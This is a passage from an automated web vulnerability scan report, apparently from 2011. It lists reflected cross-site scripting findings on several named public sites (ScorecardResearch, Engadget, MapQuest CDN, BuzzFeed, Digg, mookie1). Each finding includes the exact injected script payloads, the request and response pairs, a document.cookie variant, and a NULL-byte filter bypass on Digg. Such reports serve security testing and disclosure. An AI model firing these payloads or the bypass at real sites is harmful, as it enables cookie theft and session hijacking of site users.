Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:00 GMT
Date: Sun, 06 Feb 2011 20:37:00 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"3005693", c3:"1", c4:"http://www.electronista.com/19807<script>alert(1)</script>acb3208d838", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.67. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7f924<script>alert(1)</script>327a9db5a54 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=7f924<script>alert(1)</script>327a9db5a54&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:01 GMT
Date: Sun, 06 Feb 2011 20:37:01 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"7f924<script>alert(1)</script>327a9db5a54", c6:"", c10:"", c15:"", c16:"", r:""});

1.68. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 3ca5d<script>alert(1)</script>9482817c403 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=3ca5d<script>alert(1)</script>9482817c403&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:01 GMT
Date: Sun, 06 Feb 2011 20:37:01 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"3ca5d<script>alert(1)</script>9482817c403", c10:"", c15:"", c16:"", r:""});

1.69. http://chinese.engadget.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://chinese.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cbb5"-alert(1)-"5dc800f9cb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2cbb5"-alert(1)-"5dc800f9cb0=1 HTTP/1.1
Host: chinese.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:13 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=b6e935c068e11c437828996cb5eedd00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999957
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 87716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html
...[SNIP]...
engadgetch";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,chinese.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Inactive";
s_265.prop2="Home";
s_265.prop12="http://chinese.engadget.com/?2cbb5"-alert(1)-"5dc800f9cb0=1";
s_265.prop16="Engadget &#20013;&#25991;&#29256;";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="219";

var s_code=s_265.t();if(s_code)docume
...[SNIP]...

1.70. http://cn.engadget.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cn.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8582e"-alert(1)-"5a7ac817e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8582e"-alert(1)-"5a7ac817e08=1 HTTP/1.1
Host: cn.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:15 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=4095b140c77d5796eb3685694b1e6a1c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999973
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 91999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html" c
...[SNIP]...
nnel="wb.engadgetchs";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,cn.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Inactive";
s_265.prop2="Home";
s_265.prop12="http://cn.engadget.com/?8582e"-alert(1)-"5a7ac817e08=1";
s_265.prop16="Engadget &#20013;&#22269;&#29256;";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="223";

var s_code=s_265.t();if(s_code)docume
...[SNIP]...

1.71. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d259<script>alert(1)</script>3ed25b9c15a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage8d259<script>alert(1)</script>3ed25b9c15a?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 247

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /coverage8d259<script>alert(1)</script>3ed25b9c15a was not found on this server.</p>
...[SNIP]...

1.72. http://coverage.mqcdn.com/coverage [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload 70953<script>alert(1)</script>a0406af2794 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat70953<script>alert(1)</script>a0406af2794 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46

'sat70953<script>alert(1)</script>a0406af2794'

1.73. http://coverage.mqcdn.com/coverage [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3e48a<script>alert(1)</script>1db30dff717 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback3e48a<script>alert(1)</script>1db30dff717&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1129

MQA._covCallback3e48a<script>alert(1)</script>1db30dff717({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqacopyswitchdark'>
...[SNIP]...

1.74. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 77427<script>alert(1)</script>26ea7b496e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat&77427<script>alert(1)</script>26ea7b496e3=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1091

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqaco
...[SNIP]...
lse, "copyrights": [{"text": "i-cubed", "html": null, "group": "Imagery", "id": "i3"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat&77427<script>alert(1)</script>26ea7b496e3=1")

1.75. http://coverage.mqcdn.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a95f9<script>alert(1)</script>13b395b7000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa95f9<script>alert(1)</script>13b395b7000 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:14:35 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 250

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.icoa95f9<script>alert(1)</script>13b395b7000 was not found on this server.</p>
...[SNIP]...

1.76. http://ct.buzzfeed.com/wd/UserWidget [or parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 2d744<script>alert(1)</script>660425639af was submitted in the or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=popeater&to=1&or=vb2d744<script>alert(1)</script>660425639af&wid=1&cb=1297025740300 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:54:55 GMT
Server: lighttpd bf1
Content-Length: 577

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 130,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script>alert(1)</script>660425639af&wid=1&to=1&u=popeater - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script>
...[SNIP]...

1.77. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload c17bd<script>alert(1)</script>ad8b15919de was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=popeaterc17bd<script>alert(1)</script>ad8b15919de&to=1&or=vb&wid=1&cb=1297025740300 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:54:54 GMT
Server: lighttpd bf2
Content-Length: 577

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 130,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script>alert(1)</script>ad8b15919de - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script>
...[SNIP]...

1.78. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d7e"><script>alert(1)</script>7af3d5b7b03 was submitted in the REST URL parameter 1. This input was echoed as 16d7e"><script>alert(1)</script>7af3d5b7b03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0016d7e"><script>alert(1)</script>7af3d5b7b03 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Mon, 07-Feb-2011 20:19:40 GMT; path=/; domain=digg.com
Set-Cookie: d=be2907c0c177c974ef36013a41f21c4ec1594088a0d83e4b6f2cc9a8e23c2cb4; expires=Sat, 06-Feb-2021 06:27:20 GMT; path=/; domain=.digg.com
X-Digg-Time: D=255425 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15619

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0016d7e"><script>alert(1)</script>7af3d5b7b03.rss">
...[SNIP]...

1.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1117431738@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5623a"><script>alert(1)</script>d0b27ad4f84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM5623a"><script>alert(1)</script>d0b27ad4f84/2010DM/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM5623a"><script>alert(1)</script>d0b27ad4f84/2010DM/1082784961/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1117431738@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdebb"><script>alert(1)</script>b54197732d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbdebb"><script>alert(1)</script>b54197732d3/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbdebb"><script>alert(1)</script>b54197732d3/1449399697/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1117431738@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803d1"><script>alert(1)</script>26ba130f8ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1117431738@x23803d1"><script>alert(1)</script>26ba130f8ba?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/768404049/x23803d1"><script>alert(1)</script>26ba130f8ba/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.82. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11485203807@x23

Issue detail

